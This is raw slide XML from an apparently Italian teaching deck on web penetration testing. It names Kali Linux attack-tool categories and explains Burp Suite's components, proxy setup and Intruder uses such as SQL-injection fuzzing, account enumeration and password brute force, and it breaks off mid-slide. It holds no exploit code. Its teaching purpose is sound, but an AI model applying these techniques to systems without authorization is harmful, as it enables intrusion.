                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wi-fi crackers	</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brute force password crackers</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website vulnerabilities </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network sniffers</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network mappers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="2775" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="474947"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sql exploits</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1480" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133014" y="959483"/>
            <a:ext cx="7852080" cy="57265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600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="3330" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali linux</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3330" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Google Shape;303;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="240145"/>
            <a:ext cx="6385559" cy="51496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it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1587589"/>
            <a:ext cx="8596800" cy="38808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lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>è un software utilizzato per </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>effettuare penetration test sulle applicazioni web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"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it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Le decine di tool che ingloba al suo interno ci aiutano nel processo di testing:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>iniziando dalla mappatura</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>all’analisi della superficie di attacco</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>fino ad arrivare alla ricerca e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sfruttamento delle vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"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Principali componenti di Burp suite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;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b="1" lang="it-IT"/>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: ci aiuta ad ispezionare e modificare il traffico. Si interpone fra il browser e l’applicazione da analizzare;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: Indispensabile per il crawling dei contenuti;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: Automatizza l’individuazione di numerosi tipi di vulnerabilità;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: Strumento utile a create attacchi personalizzati per sfruttare vulnerabilità inusuali;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: Manipola e ri-invia il contenuto di una richiesta;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>Sequencer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>: Utilizzato principalmente per testare la generazione casuale dei tokens di sessione.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it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Configurazione di Burp</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="it-IT">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321" name="Google Shape;321;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1643353"/>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it-IT"/>
              <a:t>Come anticipato, bisogna far passare il traffico attraverso il </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>proxy di Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Andiamo su “Proxy – Options” e impostiamo i parametri come in figura</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="https://www.html.it/app/uploads/2014/09/2.png" id="322" name="Google Shape;322;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178338" y="3109335"/>
            <a:ext cx="4895850" cy="28860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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372535" y="978335"/>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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Andiamo su “Proxy – Intercept” e clicchiamo su “Intercept is on” in modo da disabilitare la funzione di intercept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Apriamo il nostro browser preferito e settiamo il proxy su 127.0.0.1:8080</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>In alternativa se usate firefox potete utilizzare un addons molto comodo che è foxyproxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320039" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="2" marL="1051561" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="https://www.html.it/app/uploads/2014/09/3.png" id="329" name="Google Shape;329;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384011" y="2094808"/>
            <a:ext cx="4400550" cy="164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Bug e vulnerabilità</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511079" y="1467862"/>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it-IT"/>
              <a:t>Un bug può essere definito come la conseguenza di un errore di programmazione</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Un bug che impatta la triade CIA e che può essere sfruttato da un malintenzionato diventa una vulnerabilità</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="876034" y="3340583"/>
            <a:ext cx="8397968" cy="217188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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326352" y="996807"/>
            <a:ext cx="8910012" cy="5496356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2127"/>
              <a:t>L’Intruder è uno strumento per focalizzare un attacco su dei parametri precisi. La complessità e diversità delle web applications e web services ci vedono costretti ad usare tool flessibili e dinamici per riuscire ad ottenere dei risultati concreti in un assessment. L’intruder è perfetto in questo genere di lavori.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2127"/>
              <a:t>Applicazioni di utilizzo:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1942"/>
              <a:t>Fuzzing – Identificare i principali vettori d’attacco come SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1942"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2127"/>
              <a:t>Enumerazione – Attacchi mirati ad identificare account validi sul sistema;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2127"/>
              <a:t>Brute force – Fissando un username e scorrendo la password usando un dizionario o viceversa;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1942"/>
              <a:t>Exploiting dei bug </a:t>
            </a:r>
            <a:endParaRPr sz="1942"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1942"/>
              <a:t>Crawling </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2127"/>
              <a:t>Richieste concorrenziali</a:t>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252461" y="24014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Intruder</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="it-IT"/>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982134" y="2789382"/>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sz="3240">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Burp suite test:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="3240">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3240">
                <a:latin typeface="Times New Roman"/>
